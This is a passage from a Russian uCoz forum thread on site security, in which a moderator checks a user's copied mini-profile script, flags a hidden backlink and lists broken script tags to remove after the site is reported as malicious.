</div>

<script type="text/javascript">
function openOnClick(client_type)
{
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
}
</script>
<?else?>

<font color="#FF0000">Гость</font>, <font color="green">мы рады вас видеть! Пожалуйста <a href="/index/3-0-0"><font color="green">зарегистрируйтесь</a> <font color="green">или <a interclue-click-count="1" href="javascript://" onclick="openLayerB('LF',0,'/index/40','Login',250,130,1);return false;" title="Вход"><font color="Green">авторизуйтесь</a>!</font>

<?endif?></div>

выделенное синим работать не будет на сайте. выделенное красным лишнее. вопросом помечен сомнительный скрипт содержимое которого невозможно проверить из-за того что залит он на чужой сайт и проставлен относительный путь кнему от корня чужого же сайта
но скрипт меню внутри профиля. это не очень. и не надо копировать с чужих сайтов


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Rolex-X2006
Сообщений: 7
Репутация: 0

Сообщение # 42 | 16:29:26
Взял от сюда, если убрать лишнее, пользоваться можно?

http://webhelping.ru/load/ucoz/skripty/temnyj_mini_profil/6-1-0-108

webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 43 | 16:41:47
Rolex-X2006, да. там есть все что нужно. вы должны не только скопировать код который дали, но и скачать архив который дают впридачу к коду. в этом архиве есть яваскрипт который нужен и там же находятся картинки которые нужны для работы профиля. в общем все чисто и будет работать если вы скачаете архив и установите по всем правилам. единственное - это лишнее выделенное красным
в меню. скрытая ссылка на сайт раздающего
Quote
<li><a href="http://webhelping.ru/" style="display:none;">.</a></li>
уже на ваше усмотрение оставлять или ставить вместе со скрытой ссылкой. такие ссылки поисковики не очень любят. хотя вам наверное все равно

итого: чисто все. ставить можно. но нужно скачать архив и поставить по всем правилам. тогда ещё и работать будет smile


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Rolex-X2006
Сообщений: 7
Репутация: 0

Сообщение # 44 | 16:51:01
webanet, спасибо большое, но мне говорят что мой сайт содержит вредоносное ПО, друзья говорят, почему?проверьте еще раз пожалуйста
http://todteam.clan.su/
webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 45 | 17:02:42
Rolex-X2006, заглушки ещё не снялись и это нормально. так же вы не удалили свой мини-профиль. возможно в залогиненом виде там тоже подарки сидят. я же сказала снести. и далее удалите с сайта все скрипты от хттп://todteam.clan.su/. все битые
вот список скриптов которые нужно удалить
Quote
<script type="text/javascript" src="/js/design.js"></script>
<script type="text/javascript" src="/js/cookie.js"></script>
<script type="text/javascript" src="/js/jquery-1.js"></script>
<script type="text/javascript" src="/js/colorpicker.js"></script>
<SCRIPT type="text/javascript" src="/js/padding.js"></SCRIPT>
<link type="text/css" rel="StyleSheet" href="/js/colorpicker.css" />
<link type="text/css" rel="StyleSheet" href="/js/tabcontent.css" />

сайт жуткая помойка
и опять же вижу попытки вставить новый минипрофиль
Quote
<tr><td class="boxTitle"><b><!-- <bt> -->Мини профиль<!-- </bt> --></b></td></tr>
<tr><td class="boxContent"><!-- <bc> -->
<div align="center"><img class="userAvatar" title="Гость" src="/mp/7504f641ae8e.png" border="0">
<script language="JavaScript" src="/mp/otrawenie.js"></script>

скрипт пустой картинка битая. сказано же скачать архив. яваскрипт залить на сайт и картинки тоже для нормальной работы

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если вы решили добавить к себе на сайт скрипт (скрипты для uCoz)
Страница 3 из 25«123452425»
Поиск: